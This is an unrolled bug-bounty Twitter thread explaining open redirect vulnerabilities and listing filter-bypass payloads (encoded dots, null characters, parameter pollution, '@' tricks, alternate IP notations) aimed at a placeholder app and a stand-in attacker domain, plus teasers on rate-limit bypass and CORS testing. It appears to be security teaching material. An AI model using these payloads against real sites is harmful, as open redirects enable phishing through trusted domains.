Share this page!

Snap Sec Profile picture
Twitter logo
Feb 18 โ€ข 12 tweets โ€ข 2 min read
10 different techniques to Find and Bypass Open Redirect Vulnerabilities in Web Application.

[A Thread ๐Ÿงต]

#bugbounty #bugbountytips #cybersecurity #AppSec
[1/n]

๐–๐ก๐š๐ญ ๐ข๐ฌ ๐š๐ง ๐Ž๐ฉ๐ž๐ง ๐‘๐ž๐๐ข๐ซ๐ž๐œ๐ญ ๐•๐ฎ๐ฅ๐ง๐ž๐ซ๐š๐›๐ข๐ฅ๐ข๐ญ๐ฒ?

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way.
[2/n]

๐‚๐จ๐ฆ๐ฆ๐จ๐ง ๐๐ฅ๐š๐œ๐ž๐ฌ ๐ญ๐จ ๐Ÿ๐ข๐ง๐ ๐Ž๐ฉ๐ž๐ง ๐‘๐ž๐๐ซ๐ข๐œ๐ญ๐ข๐จ๐ง:

login
register
logout
change site language
links in emails
[3/n]

For the sake of examples Let's assume:
[webapp.nt] is vulnerable app
[attacker.ed] is attacker controlled domain

๐๐š๐ฌ๐ข๐œ ๐‘๐ž๐๐ข๐ซ๐ž๐œ๐ญ ๐๐š๐ฒ๐ฅ๐จ๐š๐๐ฌ

http://webapp.nt?redirect=attacker.ed

This will redirect Users to attacker controlled domain("attacker.ed")
[4/n]

๐”๐‘๐‹ ๐›๐š๐ฌ๐ž๐ ๐ซ๐ž๐๐ข๐ซ๐ž๐œ๐ญ๐ข๐จ๐ง:

http://webapp.nt/http://attacker.ed
http://webapp.nt//http://attacker.ed
http://webapp.nt///http://attacker.ed

Blindly Appending attacker controlled URL may sometime lead to Open redirections.
[5/n]

๐—˜๐—ป๐—ฐ๐—ผ๐—ฑ๐—ถ๐—ป๐—ด ๐๐จ๐ญ(.) :

http://webapp.nt?redirect=attacker%E3%80%82ed

- Single URL encoding or . in payload
- Double URL encoding or . in payload
- Triple URL encoding or . in payload
[6/n]

๐—จ๐˜€๐—ถ๐—ป๐—ด ๐—ก๐˜‚๐—น๐—น ๐—–๐—ต๐—ฎ๐—ฟ:

http://webapp.nt?redirect=//attacker%00.ed

Mixing Nullchars to your payload may allow you to bypass the open redirect filter at the backend.
[7/n]

๐‡๐ญ๐ญ๐ฉ ๐๐š๐ซ๐š๐ฆ๐ž๐ญ๐ž๐ซ ๐๐จ๐ฅ๐ฅ๐ฎ๐ญ๐ข๐จ๐ง:

Passing same parameters twice in the same request may bypass the protection:

http://webapp.nt?redirect=//attacker.ed&redirect=//attacker.ed

or
http://webapp.nt?redirect=webapp.nt&redirect=//attacker.ed
[8/n]

๐”๐ฌ๐ข๐ง๐  @ ๐œ๐ก๐š๐ซ๐š๐œ๐ญ๐ž๐ซ:

If the company is allowing Redirects only to their own site, The following payload can be useful to bypass such protections

http://webapp.nt?redirect=//webapp.nt@attacker.ed
[9/n]

๐—จ๐˜€๐—ถ๐—ป๐—ด ๐—œ๐—ฃ ๐—ฎ๐—ฑ๐—ฑ๐—ฟ๐—ฒ๐˜€๐˜€ ๐˜„๐—ถ๐˜๐—ต ๐——๐—ถ๐—ณ๐—ณ๐—ฒ๐—ฟ๐—ฒ๐—ป๐˜ ๐—ก๐—ผ๐˜๐—ฎ๐˜๐—ถ๐—ผ๐—ป๐˜€:

Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
[10/n]

๐—˜๐—ป๐—ฐ๐—ผ๐—ฑ๐—ถ๐—ป๐—ด ๐—ง๐—ฒ๐—ฐ๐—ต๐—ป๐—ถ๐—พ๐˜‚๐—ฒ๐˜€:

Use the following encoding techniques to encode your payload if blocked by server-side:

Url Encoded
Double Url Encoded
Hex Encoded
Mixed Encoded
base64 encoded
[11/n]

๐‡๐“๐“๐ ๐ซ๐ž๐๐ข๐ซ๐ž๐œ๐ญ ๐ฌ๐ญ๐š๐ญ๐ฎ๐ฌ ๐œ๐จ๐๐ž๐ฌ:

Requests with the following Response codes maybe a indication to look for open redirect in such requests

301 Moved Permanently
302 Found
303 See Other
304 Not Modified
305 Use Proxy
307/308 Permanent/Temp Redirect

โ€ข โ€ข โ€ข

Missing some Tweet in this thread? You can try to force a refresh
ใ€€

Keep Current with Snap Sec

Snap Sec Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @snap_sec

Snap Sec Profile picture
Jan 6
8 different techniques to Bypass Rate Limits in Web Applications and API's.

[A Thread ๐Ÿงต]

#bugbounty #bugbountytips #cybersecurity #AppSec
- What is Rate Limit

Rate limiting is a process to limiting the number of request an user can make to a web server in an span of time. This can be achieved by implementing IP based, Session Based rate limits on web server.

Bypasses ๐Ÿ‘‡
- Where to Look for Rate Limit Bugs

Place like :
- Login/Signup pages
- Register Pages
- 2FA codes
- Confirmation Codes

and any other request which if bruteforce will allow attacker to achieve anything malicious should be check for "No Rate Limit" issue.

Bypasses ๐Ÿ‘‡
Read 11 tweets
Snap Sec Profile picture
Dec 5, 2021
How to Look for "Insecure CORS Configuration" vulnerabilities.

[A thread ๐Ÿงต]

#appsec #bugbounty #bugbountytips #cybersecurity
[2/n]
What is Insecure CORS issue?

An insecure CORS configuration allows any website to trigger requests with user credentials to the target application and read the responses thus enabling attackers to perform privileged actions or to retrieve potential sensitive information
[3/n]

Basic Origin Reflection Test:

Req: Origin: evil[.]com
Res: Access-Control-Allow-Origin: evil[.]com

> In this test case check if your Origin Header is being reflected within the Access-Control-Allow-Origin Header. If yes, this may be a vulnerability.
Read 8 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Like this author's thread?

Get emails when @snap_sec has new unrolls!

Check out other threads from @snap_sec!

Read all threads by @snap_sec

:(